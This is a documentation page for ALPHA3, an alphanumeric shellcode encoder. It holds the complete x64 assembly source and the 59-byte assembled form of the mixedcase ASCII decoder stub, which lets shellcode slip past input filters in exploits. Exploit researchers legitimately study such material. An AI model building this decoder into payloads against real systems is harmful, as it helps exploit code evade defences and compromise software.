Hacking/Shellcode/Alphanumeric/ALPHA3/x64/ASCII/Mixedcase/Decoder
From Skypher
|
▼Main Page |
|
,sSSs,,s, ,sSSSs, This page is part of the documentation for ALPHA3
dS" Y$P" YS" ,SY an alphanumeric shellcode encoder by SkyLined
iS' dY ssS"
YS, dSb SP, ;SP
`"YSS'"S' "YSSSY"
CODE
Below is the assembler source for the ALPHA3 mixedcase ASCII alphanumeric code decoder for x64. It assumes that RCX points to its base address.
BITS 64
mult_code equ 0x33333333
mult_dword equ 0x05050503
mult_byte equ 0x33
mult_value equ mult_dword * mult_byte ; 0505,0503 * 33 = FFFF,FF99
start:
PUSH RCX ; [ESP0] = start
PUSH mult_dword^mult_code ; [ESP1] = mult_dword^mult_code
PUSH RSP ; [ESP1] = ESP1
POP RCX ; EDX = ESP1
XOR [RCX], ESI ; [ESP1] = mult_dword^mult_code^ESI
XOR ESI, [RCX] ; ESI = = mult_dword^mult_code
POP RAX ; Clear stack
PUSH mult_code ; [ESP1] = mult_code
XOR [RCX], ESI ; [ESP1] = mult_code^mult_dword^mult_code = mult_dword
IMUL ESI,[RCX],BYTE mult_byte ; ESI = [ESP1] * mult_byte = mult_value
POP RAX ; Clear stack
PUSH BYTE (esi_value & 0xFFFFFFFF) ^ mult_value ; [ESP1] = esi_value^mult_value
PUSH RSI ; [ESP2] = mult_value
XOR [RCX], ESI ; [ESP1] = mult_value^esi_value^mult_value = esi_value
db 0x48, 0x63, 0x31
; MOVSXD RSI, [RCX] ; RSI = esi_value
POP RDX ; EAX = esi_value
POP RAX ; EDX = mult_value
POP RCX ; ECX = start
XOR [BYTE RCX+2*RSI + inc_marker - (esi_value*2)],DX ; -------.
; |
esi_value equ -0x10 ; -Something ; |
; |
decode_loop: ; |
db 0x48 ; REX:W for INC RSI |
inc_marker: ; |
dw 0xC6FF^(mult_value & 0xFFFF) ; <-- DECODED USING XOR -----'
; INC RSI
IMUL EAX, [BYTE RCX + 2*RSI + jnz_marker + 1 - ((esi_value+1)*2)], BYTE 0x30
XOR AL, [BYTE RCX + 2*RSI + jnz_marker + 2 - ((esi_value+1)*2)]
XOR [BYTE RCX + RSI + jnz_marker + 1 - (esi_value+1)], AL
jnz_marker:
db 0x75 ; JNZ -0x12 (75 EE)
; (See http://skypher.com/wiki/index.php?title=IMUL_0x30_encoding)
; high nibble encoded = 4X |
; ,------------' Low nibble encoded = 4X |
; | ,-----------------------' |
; | | ,-------------------'
; v v v
; E <--XOR 4-- A <--XOR 4-- E <--IMUL 0x30-- A (high nibble)
; ,---------------------------------'
; v
; E <--XOR A-- 4 (low nibble)
db 0x4A ; high nibble of offset to decode_loop
db 0x44 ; low nibble of offset to decode_loop
Assembled, the code is 59 bytes and looks like this:
Qh0666TY1131Xh333311k13XjiV11Hc1XZYf1TqIHf9kDqW02DqX0D1HuJD
See also
- x64 printable opcodes - A list of all available opcodes for alphanmeric code on x64.
- IMUL 0x30 encoding - A description of the technique used to encode/decode the data.
SkyLined would like to thank the following people:
- rix for the phrack article on aphanumeric shellcode.
- obscou for the phrack article on unicode-proof shellcode.
- Costin Ionescu for the idea behind w32 SEH GetPC code.
- tms320/ph4nt0m Security Team for the article on using a different IMUL value in my alphanumeric decoders.
- jamikazu for this VML fill method BoF exploit that points the SEH to the heap to bypass Software DEP .
